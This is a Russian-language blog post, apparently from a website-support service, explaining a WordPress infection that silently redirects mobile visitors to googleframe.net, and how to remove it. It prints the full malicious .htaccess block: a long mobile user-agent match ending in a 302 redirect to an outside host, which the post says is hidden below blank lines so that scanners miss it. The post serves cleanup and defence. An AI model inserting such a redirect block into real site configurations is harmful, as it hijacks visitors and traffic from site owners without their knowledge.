У сайтов на wordpress появилась новая зараза, malware wordpress googleframe.net, которая срабатывает только при просмотре сайта с мобильных устройств.

Этот вредоносный код работает следующим образом:

  1. Определяет, что посетитель открыл сайт в мобильном устройстве
  2. Переводит посетителя вашего сайта на wordpress googleframe.net  (наверное возможны варианты, потому, что запрограммирован вирус для перевода сайтов на домен mobi24.com, с которого потом идет редирект на googleframe.net).

Конечно, вирус не ворует данные, не вредит другим сайтам на хостинге, не заражает другие файлы, но уведенные пользователи, которые приходят на сайт как из поисковых систем, так и из контекстной рекламы (возможно) — это не приятно, а в некоторых случаях ещё и очень дорого.

Кстати, этот вредоносный код пока не научились определять антивирусы, например, тот же Манул от Яндекса, который довольно успешно находит внедренный в PHP код, вообще ничего не заподозрил в случае с этим malware.

Итак, как же работает Wordpress googleframe.net вирус

Причина того, что этот вирус не находят антивирусы для сайтов, и не получается найти какой-нибудь зараженный код в php файлах кроется в том, что этот вирус работает при помощи абсолютно неподозрительного кода в htaccess. После кода, необходимого для работы ЧПУ WordPress, через большое количество пустых строк добавляется код вида:

RewriteEngine on^M
RewriteCond %{HTTP_ACCEPT} “text/vnd.wap.wml|application/vnd.wap.xhtml+xml” [NC,OR]^M
RewriteCond %{HTTP_USER_AGENT} “acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-” [NC,OR]^M
RewriteCond %{HTTP_USER_AGENT} “dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-” [NC,OR]^M
RewriteCond %{HTTP_USER_AGENT} “maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv” [NC,OR]^M
RewriteCond %{HTTP_USER_AGENT} “palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany” [NC,OR]^M
RewriteCond %{HTTP_USER_AGENT} “sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo” [NC,OR]^M
RewriteCond %{HTTP_USER_AGENT} “teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi” [NC,OR]^M
RewriteCond %{HTTP_USER_AGENT} “wapp|wapr|webc|winw|winw|xda|xda-” [NC,OR]^M
RewriteCond %{HTTP_USER_AGENT} “up.browser|up.link|windowssce|iemobile|mini|mmp” [NC,OR]^M
RewriteCond %{HTTP_USER_AGENT} “symbian|iOS|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android” [NC]^M
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]^M
RewriteCond %{HTTP_USER_AGENT} !america [NC]^M
RewriteCond %{HTTP_USER_AGENT} !avant [NC]^M
RewriteCond %{HTTP_USER_AGENT} !download [NC]^M
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]^M
RewriteRule ^(.*)$ http://6.moby24.com [L,R=302]

Понятное дело, этот код не выглядит подозрительным для антивирусов, потому, что большинство файлов htaccess зачастую так и выглядят.

Как удалить Wordpress googleframe.net?

Для того, чтобы удалить этот вирус с вашего сайта необходимо выполнить всего 3 действия:

  1. откройте ваш сайт по FTP или через файл-менеджер хостинга
  2. откройте файл .htaccess, который находится в корне вашего сайта
  3. удалите код, приведенный в блоке выше и сохраните

Все, больше проблемы не должно возникать. Если у вас остались вопросы или не удаётся удалить этот вирус самостоятельно пишите в комментарии или милости просим в службу поддержки сайтов Доделко.